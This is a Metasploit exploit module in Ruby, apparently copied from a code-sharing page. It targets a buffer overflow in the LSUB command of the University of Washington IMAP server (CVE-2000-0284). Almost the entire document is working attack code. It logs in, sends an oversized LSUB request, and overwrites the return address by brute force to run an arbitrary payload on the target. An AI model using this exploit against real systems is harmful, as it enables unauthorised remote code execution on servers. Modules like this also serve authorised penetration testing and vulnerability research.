Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Brute
10
  include Msf::Exploit::Remote::Imap
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'UoW IMAP Server LSUB Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a buffer overflow in the 'LSUB'
17
        command of the University of Washington IMAP service.
18
        This vulnerability can only be exploited with a valid username
19
        and password.
20
      },
21
      'Author'         => [ 'aushack', 'jduck' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2000-0284' ],
26
          [ 'OSVDB', '12037' ],
27
          [ 'BID', '1110' ],
28
          [ 'EDB', '284' ]
29
        ],
30
      'Privileged'     => false,
31
      'Payload'        =>
32
        {
33
          'Space'    => 964,
34
          'BadChars' => "\x00\x0a\x0d\x2f",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Platform'       => 'linux',
38
      'Targets'        =>
39
        [
40
          # ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
41
          [ 'Linux Bruteforce',
42
            {
43
              'Platform'   => 'linux',
44
              'Offset'     => 1064,
45
              'Bruteforce' =>
46
                {
47
                  'Start' => { 'Ret' => 0xbffffdfc },
48
                  'Stop'  => { 'Ret' => 0xbfa00000 },
49
                  'Step'  => 200
50
                }
51
            },
52
          ]
53
        ],
54
      'DisclosureDate' => '2000-04-16',
55
      'DefaultTarget' => 0))
56
  end
57

58
  def check
59
    connect
60
    disconnect
61

62
    if (banner =~ /IMAP4rev1 v12\.264/)
63
      return Exploit::CheckCode::Appears
64
    end
65
    return Exploit::CheckCode::Safe
66

67
  end
68

69
  def brute_exploit(addresses)
70
    print_status("Trying 0x%.8x ..." % addresses['Ret'])
71

72
    if (not connect_login)
73
      fail_with(Failure::Unknown, "Unable to log in!")
74
    end
75

76
    req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
77
    sock.put(req)
78
    buf = sock.get_once
79

80
    sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
81
    sock.put(sploit)
82

83
    handler
84
    disconnect
85
  end
86
end
87

88